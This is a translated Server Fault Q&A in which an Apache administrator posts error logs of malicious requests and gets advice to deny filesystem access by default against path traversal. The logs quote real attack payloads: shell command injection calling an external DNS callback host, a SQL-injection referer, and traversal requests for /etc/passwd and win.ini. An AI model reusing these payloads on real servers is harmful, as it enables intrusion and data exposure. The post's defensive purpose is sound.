Security

提高 apache2 的安全性

  • November 3, 2020

我已經分析了我的伺服器日誌一個星期,我發現了惡意請求,我想知道是否可以保護它,因為我不知道我應該做什麼,我唯一的想法是創建一個 .htaccess規則來阻止伺服器請求中的某些單詞,例如gethostbyname,但我不知道它是否有效

[Tue Nov 03 04:14:53.839367 2020] [core:error] [pid 467:tid 140016219035392] (36)File name too long: [client 164.68.125.18:17324] AH00036: access to /;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")/purchase-saq/ failed (filesystem path '/var/www/master/;(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")|(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")&(nslookup hituqvvdoessp277d4.bxss.me||perl -e "gethostbyname('hituqvvdoessp277d4.bxss.me')")')

[Tue Nov 03 02:08:23.783130 2020] [proxy_fcgi:error] [pid 470:tid 140015933847296] [client 172.28.116.14:44214] AH01071: Got error 'Primary script unknown\n'

[Tue Nov 03 07:10:02.996899 2020] [proxy_fcgi:error] [pid 23788:tid 140014927214336] [client 164.68.112.10:5403] AH01071: Got error 'Primary script unknown\n', referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'/*";s:3:"num";s:141:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca

[Tue Oct 27 19:58:25.368520 2020] [core:error] [pid 29512:tid 140476501980928] [client 3.132.217.50:33028] AH00126: Invalid URI in request GET <meta%20http-equiv=Set-Cookie%20content=%22testjpjn=6754%22> HTTP/1.1

[Tue Oct 27 19:58:25.030965 2020] [core:error] [pid 29507:tid 140476592264960] [client 3.132.217.50:35560] AH00126: Invalid URI in request GET ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1

[Tue Oct 27 19:58:20.439013 2020] [core:error] [pid 29652:tid 140476317406976] [client 3.132.217.50:32968] AH00126: Invalid URI in request GET //../../../../../../../../../../../../etc/passwd HTTP/1.1

[Tue Oct 27 22:10:29.240575 2020] [core:error] [pid 29568:tid 140475990255360] [client 3.132.217.74:47570] AH00126: Invalid URI in request GET ../../../../../../../../../../../../winnt/win.ini HTTP/1.1

請問你能幫幫我嗎?

保護 Apache 是一個很大的話題。有關一些提示,請參閱此答案中的“A”部分。

您的最後 3 條日誌消息是路徑遍歷嘗試,以讀取主機上 Web 根目錄之外的文件。Apache 安全文件中的預設情況下保護伺服器文件建議您預設拒絕對所有文件的訪問:

<Directory "/">
 Require all denied
</Directory>

然後啟用對您想要的文件的訪問。這是一種最佳實踐,可以保護您免受路徑遍歷攻擊。

引用自:https://serverfault.com/questions/1041076

相關問答

Security

htaccess 不允許來自 IP 的請求的 200 狀態?

  • April 18, 2020
檢視問答
Virtualhost

2 個網站託管在同一個域上,1 個需要看起來像一個子文件夾 (/blog)

  • June 1, 2021
檢視問答
Security

GET http://example.com/ HTTP/1.1” 200 3421 “-” “Go-http-client/1.1

  • September 14, 2020
檢視問答
Reverse-Proxy

Apache 反向代理:在特定 URL 上放置 htaccess 類型密碼

  • September 8, 2020
檢視問答
Security

apache 網路伺服器上的使用者 ID - 一種判斷您是否被入侵的方法?

  • August 4, 2020
檢視問答
Web-Server

已解決 - 500 內部伺服器錯誤 Apache,htaccess 重定向

  • February 10, 2020
檢視問答